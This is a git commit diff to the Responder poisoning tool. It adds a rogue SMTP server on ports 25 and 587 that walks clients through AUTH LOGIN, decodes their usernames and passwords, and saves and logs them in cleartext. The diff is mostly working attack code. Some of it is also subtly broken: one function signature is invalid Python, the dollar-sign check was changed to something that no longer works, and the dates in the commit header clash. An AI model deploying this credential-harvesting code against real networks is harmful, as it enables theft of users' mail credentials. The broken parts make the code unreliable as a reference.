Added: SMTP PLAIN/LOGIN module

2025-07-07 21:41:21 -07:00 · 2013-12-30 01:29:29 -05:00 · 2013-12-30 01:29:29 -05:00 · 6828f1b11e
commit 6828f1b11e
parent f48ea3f4b6
3 changed files with 119 additions and 3 deletions
--- a/Responder.py
+++ b/Responder.py
@ -62,6 +62,7 @@ SMB_On_Off = config.get('Responder Core', 'SMB').upper()
 SQL_On_Off = config.get('Responder Core', 'SQL').upper()
 FTP_On_Off = config.get('Responder Core', 'FTP').upper()
 POP_On_Off = config.get('Responder Core', 'POP').upper()
+SMTP_On_Off = config.get('Responder Core', 'SMTP').upper()
 LDAP_On_Off = config.get('Responder Core', 'LDAP').upper()
 DNS_On_Off = config.get('Responder Core', 'DNS').upper()
 NumChal = config.get('Responder Core', 'Challenge')
@ -131,7 +132,7 @@ def WriteData(outfile,data, user):
          if re.search(user.encode('hex'), filestr.read().encode('hex')):
             filestr.close()
             return False
-          if re.search("\$", user):
+          if re.search("$".encode('hex'), user):
             filestr.close()
             return False
          else:
@ -140,7 +141,7 @@ def WriteData(outfile,data, user):
                outf2.write("\n")
                outf2.close()

-def PrintData(outfile,user):
+def PrintData(outfile,str(user)):
    if Verbose == True:
       return True
    if os.path.isfile(outfile) == True:
@ -161,7 +162,7 @@ Challenge = ""
 for i in range(0,len(NumChal),2):
    Challenge += NumChal[i:i+2].decode("hex")

-Show_Help("[+]NBT-NS & LLMNR responder started\n[+]Loading Responder.conf File..\nGlobal Parameters set:\nResponder is bound to this interface:%s\nChallenge set is:%s\nWPAD Proxy Server is:%s\nWPAD script loaded:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nPOP3 Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\nServing Executable via HTTP&WPAD is:%s\nAlways Serving a Specific File via HTTP&WPAD is:%s\n\n"%(BIND_TO_Interface, NumChal,WPAD_On_Off,WPAD_Script,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,POP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off))
+Show_Help("[+]NBT-NS & LLMNR responder started\n[+]Loading Responder.conf File..\nGlobal Parameters set:\nResponder is bound to this interface:%s\nChallenge set is:%s\nWPAD Proxy Server is:%s\nWPAD script loaded:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nPOP3 Server is:%s\nSMTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\nServing Executable via HTTP&WPAD is:%s\nAlways Serving a Specific File via HTTP&WPAD is:%s\n\n"%(BIND_TO_Interface, NumChal,WPAD_On_Off,WPAD_Script,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,POP_On_Off,SMTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off))

 #Simple NBNS Services.
 W_REDIRECT   = "\x41\x41\x00"
@ -1555,6 +1556,37 @@ class POP(BaseRequestHandler):
        except Exception:
           pass

+##################################################################################
+#ESMTP Stuff
+##################################################################################
+from SMTPPackets import *
+
+#ESMTP server class.
+class ESMTP(BaseRequestHandler):
+
+    def handle(self):
+        try:
+          self.request.send(str(SMTPGreating()))
+          data = self.request.recv(1024)
+          if data[0:4] == "EHLO":
+             self.request.send(str(SMTPAUTH()))
+             data = self.request.recv(1024)
+          if data[0:4] == "AUTH":
+             self.request.send(str(SMTPAUTH1()))
+             data = self.request.recv(1024)
+             if data:
+                Username = b64decode(data[:len(data)-2])
+                self.request.send(str(SMTPAUTH2()))
+                data = self.request.recv(1024)
+                if data:
+                   Password = b64decode(data[:len(data)-2])
+                   Outfile = os.path.join(ResponderPATH,"SMTP-Clear-Text-Password-"+self.client_address[0]+".txt")
+                   WriteData(Outfile,Username+":"+Password, Username+":"+Password)
+                   print "[+]SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password)
+                   logging.warning("[+]SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password))
+
+        except Exception:
+           pass

 ##################################################################################
 #Loading the servers
@ -1619,6 +1651,13 @@ def Is_LDAP_On(LDAP_On_Off):
    if LDAP_On_Off == "OFF":
       return False

+#Function name self-explanatory
+def Is_SMTP_On(SMTP_On_Off):
+    if SMTP_On_Off == "ON":
+       return thread.start_new(serve_thread_tcp,('', 25,ESMTP)),thread.start_new(serve_thread_tcp,('', 587,ESMTP))
+    if SMTP_On_Off == "OFF":
+       return False
+
 #Function name self-explanatory
 def Is_DNS_On(DNS_On_Off):
    if DNS_On_Off == "ON":
@ -1682,6 +1721,7 @@ def main():
      Is_LDAP_On(LDAP_On_Off)
      Is_DNS_On(DNS_On_Off)
      Is_POP_On(POP_On_Off)
+      Is_SMTP_On(SMTP_On_Off)
      #Browser listener loaded by default
      thread.start_new(serve_thread_udp,('', 138,Browser))
      ## Poisoner loaded by default, it's the purpose of this tool...